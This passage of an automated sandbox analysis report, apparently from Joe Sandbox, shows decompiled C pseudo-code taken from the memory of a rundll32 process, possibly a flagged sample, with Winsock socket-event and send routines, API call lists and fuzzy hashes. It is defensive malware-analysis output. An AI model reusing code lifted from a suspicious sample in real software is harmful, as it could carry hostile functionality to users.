                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											asm("int3");
                                                                                              											_t202 = _t204;
                                                                                              											_t123 =  *0x42a4008; // 0xd33db39d
                                                                                              											_v68 = _t123 ^ _t202;
                                                                                              											_t194 = _t161;
                                                                                              											_t125 =  &_v112;
                                                                                              											_t185 = 1;
                                                                                              											__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t194 + 0x1c)),  *((intOrPtr*)(_t194 + 0x20)), _t125, _t184, _t192, _t201, 0x80004005);
                                                                                              											if(_t125 != 0xffffffff) {
                                                                                              												L33:
                                                                                              												if( *((intOrPtr*)( *_t194 + 0x40))() != 0) {
                                                                                              													L37:
                                                                                              													if(_t185 == 0) {
                                                                                              														goto L52;
                                                                                              													} else {
                                                                                              														if((_v56 & 0x00000001) != 0) {
                                                                                              															_t135 = _v52;
                                                                                              															if(_t135 != 0) {
                                                                                              																 *(_t194 + 0xc) = 1;
                                                                                              																_t185 = 0;
                                                                                              																 *(_t194 + 0x10) = 4;
                                                                                              																 *((intOrPtr*)(_t194 + 0x14)) = _t135;
                                                                                              																 *(_t194 + 0x18) = 1;
                                                                                              															} else {
                                                                                              																_t185 = E0426F540(_t194);
                                                                                              															}
                                                                                              														}
                                                                                              														if(_t185 == 0) {
                                                                                              															goto L52;
                                                                                              														} else {
                                                                                              															if((_v56 & 0x00000002) != 0) {
                                                                                              																_t133 = _v48;
                                                                                              																if(_t133 != 0) {
                                                                                              																	 *(_t194 + 0xc) = 1;
                                                                                              																	_t185 = 0;
                                                                                              																	 *(_t194 + 0x10) = 3;
                                                                                              																	 *((intOrPtr*)(_t194 + 0x14)) = _t133;
                                                                                              																	 *(_t194 + 0x18) = 1;
                                                                                              																} else {
                                                                                              																	_t185 = E0426F610(_t194);
                                                                                              																}
                                                                                              															}
                                                                                              															if(_t185 == 0 || (_v56 & 0x00000020) == 0) {
                                                                                              																goto L52;
                                                                                              															} else {
                                                                                              																_t130 = _v32;
                                                                                              																 *(_t194 + 0xc) = 1;
                                                                                              																 *(_t194 + 0x10) = 5;
                                                                                              																 *(_t194 + 0x18) = 1;
                                                                                              																if(_t130 != 0) {
                                                                                              																	 *((intOrPtr*)(_t194 + 0x14)) = _t130;
                                                                                              																	_t185 = 0;
                                                                                              																	goto L52;
                                                                                              																} else {
                                                                                              																	 *((intOrPtr*)(_t194 + 0x14)) = _t130;
                                                                                              																	return E04275AFE(_v12 ^ _t202);
                                                                                              																}
                                                                                              															}
                                                                                              														}
                                                                                              													}
                                                                                              												} else {
                                                                                              													if(_t185 == 0) {
                                                                                              														L52:
                                                                                              														return E04275AFE(_v12 ^ _t202);
                                                                                              													} else {
                                                                                              														if((_v56 & 0x00000010) != 0) {
                                                                                              															_t137 =  &_v56;
                                                                                              															_push(_t137);
                                                                                              															L54();
                                                                                              															_t185 = _t137;
                                                                                              														}
                                                                                              														goto L37;
                                                                                              													}
                                                                                              												}
                                                                                              											} else {
                                                                                              												__imp__#111(_t154);
                                                                                              												_t157 = _t125;
                                                                                              												_t138 = _v56;
                                                                                              												if((_t138 & 0x00000010) == 0) {
                                                                                              													if((_t138 & 0x00000020) == 0) {
                                                                                              														if((_t138 & 0x00000001) == 0) {
                                                                                              															_t138 = 3;
                                                                                              															_t190 =  !=  ? 3 : 0;
                                                                                              														} else {
                                                                                              															_t190 = 4;
                                                                                              														}
                                                                                              													} else {
                                                                                              														_t190 = 5;
                                                                                              													}
                                                                                              												} else {
                                                                                              													_t190 = 2;
                                                                                              												}
                                                                                              												__imp__WSAResetEvent( *((intOrPtr*)(_t194 + 0x20)));
                                                                                              												if(_t138 == 0) {
                                                                                              													_push(0x80004005);
                                                                                              													E04257AC0();
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													asm("int3");
                                                                                              													_push(_t202);
                                                                                              													_t140 = _v132;
                                                                                              													_push(_t194);
                                                                                              													_t197 = _t161;
                                                                                              													_t84 = _t140 + 0x14; // 0x8b0b75c0
                                                                                              													_t141 =  *_t84;
                                                                                              													if(_t141 != 0) {
                                                                                              														L57:
                                                                                              														 *(_t197 + 0xc) = 1;
                                                                                              														 *(_t197 + 0x10) = 2;
                                                                                              														 *(_t197 + 0x14) = _t141;
                                                                                              														 *(_t197 + 0x18) = 1;
                                                                                              														return 0;
                                                                                              													} else {
                                                                                              														__imp__WSAEventSelect( *((intOrPtr*)(_t197 + 0x1c)),  *((intOrPtr*)(_t197 + 0x20)), 0x23);
                                                                                              														if(_t141 != 0xffffffff) {
                                                                                              															 *(_t197 + 0x4c) = 1;
                                                                                              															 *(_t197 + 0x50) = 1;
                                                                                              															SetLastError(0);
                                                                                              															if( *((intOrPtr*)( *_t197 + 0x7c))() != 2) {
                                                                                              																return 1;
                                                                                              															} else {
                                                                                              																 *(_t197 + 0xc) = 0;
                                                                                              																 *(_t197 + 0x10) = 5;
                                                                                              																 *(_t197 + 0x14) = 0;
                                                                                              																 *(_t197 + 0x18) = 1;
                                                                                              																return 0;
                                                                                              															}
                                                                                              														} else {
                                                                                              															__imp__#111();
                                                                                              															goto L57;
                                                                                              														}
                                                                                              													}
                                                                                              												} else {
                                                                                              													 *(_t194 + 0x10) = _t190;
                                                                                              													_t185 = 0;
                                                                                              													 *((intOrPtr*)(_t194 + 0x14)) = _t157;
                                                                                              													 *(_t194 + 0xc) = 1;
                                                                                              													 *(_t194 + 0x18) = 1;
                                                                                              													goto L33;
                                                                                              												}
                                                                                              											}
                                                                                              										} else {
                                                                                              											__imp__#111();
                                                                                              											 *(_t192 + 0xc) = 1;
                                                                                              											 *(_t192 + 0x10) = 0;
                                                                                              											 *((intOrPtr*)(_t192 + 0x14)) = _t121;
                                                                                              											 *(_t192 + 0x18) = 1;
                                                                                              											goto L18;
                                                                                              										}
                                                                                              									} else {
                                                                                              										if( *((intOrPtr*)( *_t192 + 0xbc))() == 0) {
                                                                                              											goto L18;
                                                                                              										} else {
                                                                                              											_t121 = E0426F540(_t192);
                                                                                              											goto L12;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t121 = E0426F610(_t192);
                                                                                              								goto L12;
                                                                                              							}
                                                                                              						} else {
                                                                                              							L23();
                                                                                              							L12:
                                                                                              							if(_t121 == 0) {
                                                                                              								goto L18;
                                                                                              							} else {
                                                                                              								goto L13;
                                                                                              							}
                                                                                              						}
                                                                                              						goto L61;
                                                                                              						L13:
                                                                                              						_t161 = _t192;
                                                                                              					} while ( *((intOrPtr*)( *_t192 + 0x24))() != 0);
                                                                                              					goto L18;
                                                                                              				}
                                                                                              				L61:
                                                                                              			}









































                                                                                              0x0426f196
                                                                                              0x0426f19d
                                                                                              0x0426f1a8
                                                                                              0x0426f1ac
                                                                                              0x0426f1b3
                                                                                              0x0426f1b5
                                                                                              0x0426f1be
                                                                                              0x0426f1c1
                                                                                              0x0426f1ca
                                                                                              0x0426f1d3
                                                                                              0x0426f1dc
                                                                                              0x0426f1df
                                                                                              0x0426f1e2
                                                                                              0x0426f1eb
                                                                                              0x0426f1ee
                                                                                              0x0426f1f3
                                                                                              0x0426f1f6
                                                                                              0x0426f1fd
                                                                                              0x0426f204
                                                                                              0x0426f204
                                                                                              0x0426f212
                                                                                              0x0426f219
                                                                                              0x0426f220
                                                                                              0x0426f2b5
                                                                                              0x0426f2c2
                                                                                              0x0426f2cc
                                                                                              0x0426f2dd
                                                                                              0x0426f2dd
                                                                                              0x0426f2e0
                                                                                              0x0426f2f4
                                                                                              0x0426f226
                                                                                              0x0426f226
                                                                                              0x0426f230
                                                                                              0x0426f23c
                                                                                              0x0426f240
                                                                                              0x0426f24e
                                                                                              0x0426f25c
                                                                                              0x0426f2ae
                                                                                              0x00000000
                                                                                              0x0426f25e
                                                                                              0x0426f261
                                                                                              0x0426f28c
                                                                                              0x0426f2fc
                                                                                              0x0426f301
                                                                                              0x0426f302
                                                                                              0x0426f303
                                                                                              0x0426f304
                                                                                              0x0426f305
                                                                                              0x0426f306
                                                                                              0x0426f307
                                                                                              0x0426f308
                                                                                              0x0426f309
                                                                                              0x0426f30a
                                                                                              0x0426f30b
                                                                                              0x0426f30c
                                                                                              0x0426f30d
                                                                                              0x0426f30e
                                                                                              0x0426f30f
                                                                                              0x0426f311
                                                                                              0x0426f316
                                                                                              0x0426f31d
                                                                                              0x0426f322
                                                                                              0x0426f324
                                                                                              0x0426f328
                                                                                              0x0426f333
                                                                                              0x0426f33c
                                                                                              0x0426f39f
                                                                                              0x0426f3a8
                                                                                              0x0426f3c5
                                                                                              0x0426f3c7
                                                                                              0x00000000
                                                                                              0x0426f3cd
                                                                                              0x0426f3d1
                                                                                              0x0426f3d3
                                                                                              0x0426f3d8
                                                                                              0x0426f3e5
                                                                                              0x0426f3ec
                                                                                              0x0426f3ee
                                                                                              0x0426f3f5
                                                                                              0x0426f3f8
                                                                                              0x0426f3da
                                                                                              0x0426f3e1
                                                                                              0x0426f3e1
                                                                                              0x0426f3d8
                                                                                              0x0426f401
                                                                                              0x00000000
                                                                                              0x0426f403
                                                                                              0x0426f407
                                                                                              0x0426f409
                                                                                              0x0426f40e
                                                                                              0x0426f41b
                                                                                              0x0426f422
                                                                                              0x0426f424
                                                                                              0x0426f42b
                                                                                              0x0426f42e
                                                                                              0x0426f410
                                                                                              0x0426f417
                                                                                              0x0426f417
                                                                                              0x0426f40e
                                                                                              0x0426f437
                                                                                              0x00000000
                                                                                              0x0426f43f
                                                                                              0x0426f43f
                                                                                              0x0426f442
                                                                                              0x0426f449
                                                                                              0x0426f450
                                                                                              0x0426f459
                                                                                              0x0426f472
                                                                                              0x0426f475
                                                                                              0x00000000
                                                                                              0x0426f45b
                                                                                              0x0426f45d
                                                                                              0x0426f471
                                                                                              0x0426f471
                                                                                              0x0426f459
                                                                                              0x0426f437
                                                                                              0x0426f401
                                                                                              0x0426f3aa
                                                                                              0x0426f3ac
                                                                                              0x0426f477
                                                                                              0x0426f488
                                                                                              0x0426f3b2
                                                                                              0x0426f3b6
                                                                                              0x0426f3b8
                                                                                              0x0426f3bd
                                                                                              0x0426f3be
                                                                                              0x0426f3c3
                                                                                              0x0426f3c3
                                                                                              0x00000000
                                                                                              0x0426f3b6
                                                                                              0x0426f3ac
                                                                                              0x0426f33e
                                                                                              0x0426f33f
                                                                                              0x0426f345
                                                                                              0x0426f349
                                                                                              0x0426f34e
                                                                                              0x0426f359
                                                                                              0x0426f364
                                                                                              0x0426f36f
                                                                                              0x0426f374
                                                                                              0x0426f366
                                                                                              0x0426f366
                                                                                              0x0426f366
                                                                                              0x0426f35b
                                                                                              0x0426f35b
                                                                                              0x0426f35b
                                                                                              0x0426f350
                                                                                              0x0426f350
                                                                                              0x0426f350
                                                                                              0x0426f37a
                                                                                              0x0426f382
                                                                                              0x0426f489
                                                                                              0x0426f48e
                                                                                              0x0426f493
                                                                                              0x0426f494
                                                                                              0x0426f495
                                                                                              0x0426f496
                                                                                              0x0426f497
                                                                                              0x0426f498
                                                                                              0x0426f499
                                                                                              0x0426f49a
                                                                                              0x0426f49b
                                                                                              0x0426f49c
                                                                                              0x0426f49d
                                                                                              0x0426f49e
                                                                                              0x0426f49f
                                                                                              0x0426f4a0
                                                                                              0x0426f4a3
                                                                                              0x0426f4a6
                                                                                              0x0426f4a7
                                                                                              0x0426f4a9
                                                                                              0x0426f4a9
                                                                                              0x0426f4ae
                                                                                              0x0426f4c9
                                                                                              0x0426f4c9
                                                                                              0x0426f4d0
                                                                                              0x0426f4d7
                                                                                              0x0426f4dc
                                                                                              0x0426f4e5
                                                                                              0x0426f4b0
                                                                                              0x0426f4b8
                                                                                              0x0426f4c1
                                                                                              0x0426f4e8
                                                                                              0x0426f4f1
                                                                                              0x0426f4f8
                                                                                              0x0426f508
                                                                                              0x0426f534
                                                                                              0x0426f50a
                                                                                              0x0426f50a
                                                                                              0x0426f513
                                                                                              0x0426f51a
                                                                                              0x0426f521
                                                                                              0x0426f52a
                                                                                              0x0426f52a
                                                                                              0x0426f4c3
                                                                                              0x0426f4c3
                                                                                              0x00000000
                                                                                              0x0426f4c3
                                                                                              0x0426f4c1
                                                                                              0x0426f388
                                                                                              0x0426f388
                                                                                              0x0426f38b
                                                                                              0x0426f38d
                                                                                              0x0426f390
                                                                                              0x0426f397
                                                                                              0x00000000
                                                                                              0x0426f39e
                                                                                              0x0426f382
                                                                                              0x0426f28e
                                                                                              0x0426f28e
                                                                                              0x0426f294
                                                                                              0x0426f29b
                                                                                              0x0426f2a2
                                                                                              0x0426f2a5
                                                                                              0x00000000
                                                                                              0x0426f2a5
                                                                                              0x0426f263
                                                                                              0x0426f26f
                                                                                              0x00000000
                                                                                              0x0426f271
                                                                                              0x0426f273
                                                                                              0x00000000
                                                                                              0x0426f273
                                                                                              0x0426f26f
                                                                                              0x0426f261
                                                                                              0x0426f250
                                                                                              0x0426f252
                                                                                              0x00000000
                                                                                              0x0426f252
                                                                                              0x0426f242
                                                                                              0x0426f244
                                                                                              0x0426f278
                                                                                              0x0426f27a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0426f27a
                                                                                              0x00000000
                                                                                              0x0426f27c
                                                                                              0x0426f27e
                                                                                              0x0426f283
                                                                                              0x00000000
                                                                                              0x0426f287
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426F1AC
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426F1B0
                                                                                              • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000,?,00000000), ref: 0426F23C
                                                                                              • WSAGetLastError.WS2_32(?,00000000), ref: 0426F28E
                                                                                                • Part of subcall function 0426F610: RtlEnterCriticalSection.NTDLL(?), ref: 0426F644
                                                                                                • Part of subcall function 0426F610: RtlLeaveCriticalSection.NTDLL(?), ref: 0426F69B
                                                                                                • Part of subcall function 0426F610: HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0426F6DF
                                                                                                • Part of subcall function 0426F610: RtlEnterCriticalSection.NTDLL(?), ref: 0426F6F1
                                                                                                • Part of subcall function 0426F610: RtlLeaveCriticalSection.NTDLL(?), ref: 0426F730
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426F2BD
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0426F2E0
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalCurrentSectionThread$EnterLeave$ErrorEventsFreeHeapLastMultipleWait
                                                                                              • String ID:
                                                                                              • API String ID: 2095029031-0
                                                                                              • Opcode ID: 7f4ce267d7400fc63301dabc7bdb4313ccfa82e7734c644b72652050e9ab142d
                                                                                              • Instruction ID: 355a30cce326e5d7f8a6cb7593406346bc3b403b4eac3af058d89e979976c2ee
                                                                                              • Opcode Fuzzy Hash: 7f4ce267d7400fc63301dabc7bdb4313ccfa82e7734c644b72652050e9ab142d
                                                                                              • Instruction Fuzzy Hash: C44146757106059FEB20DF68EA88B6EB7E4BF08304F210619D946D7284DB74F941CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 67%
                                                                                              			E042747C0(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                              				signed int _v8;
                                                                                              				char _v12;
                                                                                              				char _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				signed int _t26;
                                                                                              				char* _t29;
                                                                                              				intOrPtr _t30;
                                                                                              				void* _t43;
                                                                                              				intOrPtr _t58;
                                                                                              				void* _t59;
                                                                                              				struct _CRITICAL_SECTION* _t61;
                                                                                              				signed int _t63;
                                                                                              
                                                                                              				_t59 = __esi;
                                                                                              				_t43 = __ebx;
                                                                                              				_t26 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t26 ^ _t63;
                                                                                              				_t58 = _a4;
                                                                                              				_t29 =  &_v12;
                                                                                              				_v20 = __ecx;
                                                                                              				_v16 = 4;
                                                                                              				__imp__#7( *((intOrPtr*)(_t58 + 0x88)), 0xffff, 0x1001, _t29,  &_v16);
                                                                                              				if(_t29 == 0xffffffff) {
                                                                                              					L2:
                                                                                              					_t30 = 0x4000;
                                                                                              					_v12 = 0x4000;
                                                                                              				} else {
                                                                                              					_t30 = _v12;
                                                                                              					if(_t30 <= 0) {
                                                                                              						goto L2;
                                                                                              					}
                                                                                              				}
                                                                                              				if( *((intOrPtr*)(_t58 + 0x44)) <= _t30) {
                                                                                              					_push(_t43);
                                                                                              					_t44 = 0;
                                                                                              					_push(_t59);
                                                                                              					if( *((intOrPtr*)(_t58 + 0x40)) <= 0 || InterlockedCompareExchange(_t58 + 0x3c, 0, 1) != 1) {
                                                                                              						L18:
                                                                                              						return E04275AFE(_v8 ^ _t63);
                                                                                              					} else {
                                                                                              						_t61 = _t58 + 0x6c;
                                                                                              						EnterCriticalSection(_t61);
                                                                                              						if( *((intOrPtr*)(_t58 + 0x30)) != 0) {
                                                                                              							if( *((intOrPtr*)(_t58 + 0x40)) > 0) {
                                                                                              								_t44 = E04274A50(0, _v20, _t58, _t61, _t58);
                                                                                              							}
                                                                                              							 *(_t58 + 0x3c) = 1;
                                                                                              							LeaveCriticalSection(_t61);
                                                                                              							if(_t44 != 0x3e5) {
                                                                                              								if(_t44 != 0 && _t44 != 0x2736 && _t44 != 0x3e3) {
                                                                                              									E04272920(_v20, _t58, 2, 3, _t44);
                                                                                              								}
                                                                                              							} else {
                                                                                              								if( *(_t58 + 0x3c) != 0) {
                                                                                              									PostQueuedCompletionStatus( *(_v20 + 0x50), 0xfffffff3,  *(_t58 + 4), 0);
                                                                                              								}
                                                                                              							}
                                                                                              							goto L18;
                                                                                              						} else {
                                                                                              							LeaveCriticalSection(_t61);
                                                                                              							return E04275AFE(_v8 ^ _t63);
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					return E04275AFE(_v8 ^ _t63);
                                                                                              				}
                                                                                              			}















                                                                                              0x042747c0
                                                                                              0x042747c0
                                                                                              0x042747c6
                                                                                              0x042747cd
                                                                                              0x042747d1
                                                                                              0x042747d8
                                                                                              0x042747db
                                                                                              0x042747ef
                                                                                              0x042747f6
                                                                                              0x042747ff
                                                                                              0x04274808
                                                                                              0x04274808
                                                                                              0x0427480d
                                                                                              0x04274801
                                                                                              0x04274801
                                                                                              0x04274806
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04274806
                                                                                              0x04274813
                                                                                              0x04274828
                                                                                              0x04274829
                                                                                              0x0427482b
                                                                                              0x0427482f
                                                                                              0x042748dc
                                                                                              0x042748ee
                                                                                              0x0427484b
                                                                                              0x0427484b
                                                                                              0x0427484f
                                                                                              0x04274858
                                                                                              0x0427487c
                                                                                              0x04274887
                                                                                              0x04274887
                                                                                              0x0427488a
                                                                                              0x04274891
                                                                                              0x0427489d
                                                                                              0x042748bc
                                                                                              0x042748d7
                                                                                              0x042748d7
                                                                                              0x0427489f
                                                                                              0x042748a3
                                                                                              0x042748b2
                                                                                              0x042748b2
                                                                                              0x042748a3
                                                                                              0x00000000
                                                                                              0x0427485a
                                                                                              0x0427485b
                                                                                              0x04274876
                                                                                              0x04274876
                                                                                              0x04274858
                                                                                              0x04274815
                                                                                              0x04274825
                                                                                              0x04274825

                                                                                              APIs
                                                                                              • getsockopt.WS2_32(?,0000FFFF,00001001,?,00000000), ref: 042747F6
                                                                                              • InterlockedCompareExchange.KERNEL32(00000000,00000000,00000001), ref: 0427483C
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0427484F
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0427485B
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 04274891
                                                                                              • PostQueuedCompletionStatus.KERNEL32(?,000000F3,00000001,00000000), ref: 042748B2
                                                                                                • Part of subcall function 04274A50: InterlockedExchangeAdd.KERNEL32(?,00004E20), ref: 04274ADB
                                                                                                • Part of subcall function 04274A50: WSASend.WS2_32(?,00004E20,00000001,?,00000000,?,00000000), ref: 04274B0E
                                                                                                • Part of subcall function 04274A50: WSAGetLastError.WS2_32 ref: 04274B19
                                                                                                • Part of subcall function 04274A50: InterlockedDecrement.KERNEL32(00000002), ref: 04274B29
                                                                                                • Part of subcall function 04274A50: HeapFree.KERNEL32(?,00000000,?,?), ref: 04274B59
                                                                                                • Part of subcall function 04272920: RtlEnterCriticalSection.NTDLL(00000054), ref: 04272959
                                                                                                • Part of subcall function 04272920: RtlEnterCriticalSection.NTDLL(-0000006C), ref: 0427295F
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterInterlocked$ExchangeLeave$CompareCompletionDecrementErrorFreeHeapLastPostQueuedSendStatusgetsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 2014370420-0
                                                                                              • Opcode ID: b6598a96442420b83a7cfa8e8dcd37e314cf657707bb2b1fe5988facf62b2fef
                                                                                              • Instruction ID: 3902476a27d9941dc540ebeb71275777e2f746672dacc3aed62fd7fb6f3921bc
                                                                                              • Opcode Fuzzy Hash: b6598a96442420b83a7cfa8e8dcd37e314cf657707bb2b1fe5988facf62b2fef
                                                                                              • Instruction Fuzzy Hash: B0317371B1114EBFE724AFA8EC84ABEF368FF05315F50412AE50196580DB79BD518B80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 97%
                                                                                              			E0426F610(void* __ecx) {
                                                                                              				void* _v8;
                                                                                              				long _t33;
                                                                                              				void* _t37;
                                                                                              				long _t39;
                                                                                              				void* _t40;
                                                                                              				void* _t44;
                                                                                              				void* _t53;
                                                                                              				struct _CRITICAL_SECTION* _t57;
                                                                                              				struct _CRITICAL_SECTION* _t59;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t44 = __ecx;
                                                                                              				_v8 = 0;
                                                                                              				while( *((intOrPtr*)(_t44 + 0x180)) > 0) {
                                                                                              					_t57 = _t44 + 0x14c;
                                                                                              					EnterCriticalSection(_t57);
                                                                                              					_t53 =  *(_t44 + 0x168);
                                                                                              					if(_t53 ==  *(_t44 + 0x16c)) {
                                                                                              						if(_t53 != 0) {
                                                                                              							 *(_t44 + 0x168) = 0;
                                                                                              							 *(_t44 + 0x16c) = 0;
                                                                                              							goto L6;
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t40 =  *(_t53 + 4);
                                                                                              						 *(_t44 + 0x168) = _t40;
                                                                                              						 *(_t40 + 8) = 0;
                                                                                              						L6:
                                                                                              						if(_t53 != 0) {
                                                                                              							 *(_t53 + 4) = 0;
                                                                                              							 *(_t53 + 8) = 0;
                                                                                              							 *((intOrPtr*)(_t44 + 0x164)) =  *((intOrPtr*)(_t44 + 0x164)) - 1;
                                                                                              						}
                                                                                              					}
                                                                                              					LeaveCriticalSection(_t57);
                                                                                              					if(_t53 == 0) {
                                                                                              						break;
                                                                                              					} else {
                                                                                              						if(E0426F770(_t44, _t53,  &_v8) == 0) {
                                                                                              							_t33 = E0426C930(_t44 + 0x84, _t53);
                                                                                              							if(_t33 == 0) {
                                                                                              								HeapFree( *( *_t53), _t33, _t53);
                                                                                              							}
                                                                                              							return 0;
                                                                                              						} else {
                                                                                              							if(_v8 != 0) {
                                                                                              								_t59 = _t44 + 0x14c;
                                                                                              								EnterCriticalSection(_t59);
                                                                                              								_t37 =  *(_t44 + 0x168);
                                                                                              								if(_t37 == 0) {
                                                                                              									 *(_t53 + 8) = 0;
                                                                                              									 *(_t53 + 4) = 0;
                                                                                              									 *(_t44 + 0x16c) = _t53;
                                                                                              								} else {
                                                                                              									 *(_t37 + 8) = _t53;
                                                                                              									 *(_t53 + 4) =  *(_t44 + 0x168);
                                                                                              								}
                                                                                              								 *((intOrPtr*)(_t44 + 0x164)) =  *((intOrPtr*)(_t44 + 0x164)) + 1;
                                                                                              								 *(_t44 + 0x168) = _t53;
                                                                                              								LeaveCriticalSection(_t59);
                                                                                              								break;
                                                                                              							} else {
                                                                                              								_t39 = E0426C930(_t44 + 0x84, _t53);
                                                                                              								if(_t39 == 0) {
                                                                                              									HeapFree( *( *_t53), _t39, _t53);
                                                                                              								}
                                                                                              								continue;
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					L21:
                                                                                              				}
                                                                                              				return 1;
                                                                                              				goto L21;
                                                                                              			}












                                                                                              0x0426f616
                                                                                              0x0426f61a
                                                                                              0x0426f61c
                                                                                              0x0426f630
                                                                                              0x0426f63d
                                                                                              0x0426f644
                                                                                              0x0426f64a
                                                                                              0x0426f656
                                                                                              0x0426f66c
                                                                                              0x0426f66e
                                                                                              0x0426f678
                                                                                              0x00000000
                                                                                              0x0426f678
                                                                                              0x0426f658
                                                                                              0x0426f658
                                                                                              0x0426f65b
                                                                                              0x0426f661
                                                                                              0x0426f682
                                                                                              0x0426f684
                                                                                              0x0426f686
                                                                                              0x0426f68d
                                                                                              0x0426f694
                                                                                              0x0426f694
                                                                                              0x0426f684
                                                                                              0x0426f69b
                                                                                              0x0426f6a3
                                                                                              0x00000000
                                                                                              0x0426f6a9
                                                                                              0x0426f6b8
                                                                                              0x0426f749
                                                                                              0x0426f750
                                                                                              0x0426f758
                                                                                              0x0426f758
                                                                                              0x0426f766
                                                                                              0x0426f6be
                                                                                              0x0426f6c3
                                                                                              0x0426f6ea
                                                                                              0x0426f6f1
                                                                                              0x0426f6f7
                                                                                              0x0426f6ff
                                                                                              0x0426f70f
                                                                                              0x0426f716
                                                                                              0x0426f71d
                                                                                              0x0426f701
                                                                                              0x0426f701
                                                                                              0x0426f70a
                                                                                              0x0426f70a
                                                                                              0x0426f723
                                                                                              0x0426f72a
                                                                                              0x0426f730
                                                                                              0x00000000
                                                                                              0x0426f6c5
                                                                                              0x0426f6cc
                                                                                              0x0426f6d3
                                                                                              0x0426f6df
                                                                                              0x0426f6df
                                                                                              0x00000000
                                                                                              0x0426f6d3
                                                                                              0x0426f6c3
                                                                                              0x0426f6b8
                                                                                              0x00000000
                                                                                              0x0426f6a3
                                                                                              0x0426f741
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0426F644
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0426F69B
                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0426F6DF
                                                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 0426F6F1
                                                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 0426F730
                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0426F758
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterFreeHeapLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3296397286-0
                                                                                              • Opcode ID: 0038134435e1fd239b4088dd94818889454a8d36f7d729b7860e37ef3526de3a
                                                                                              • Instruction ID: ce08a9208ff755874cc444c3d51eceaa2b1791d226bff4d4ddc6dfb6a60d81d1
                                                                                              • Opcode Fuzzy Hash: 0038134435e1fd239b4088dd94818889454a8d36f7d729b7860e37ef3526de3a
                                                                                              • Instruction Fuzzy Hash: 1531A271314201AFDB109F19E988BE6B7F8FF45314F1581B9EC1E8B251EB75A885CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E042738F0(intOrPtr* __ecx, int _a8, void* _a12) {
                                                                                              				intOrPtr* _v8;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				int _t26;
                                                                                              				void* _t39;
                                                                                              				int _t51;
                                                                                              				struct _CRITICAL_SECTION* _t56;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t54 = __ecx;
                                                                                              				_t51 = _a8;
                                                                                              				_v8 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                                                                              					 *((intOrPtr*)(_t51 + 0x38)) = timeGetTime();
                                                                                              				}
                                                                                              				_t39 = _a12;
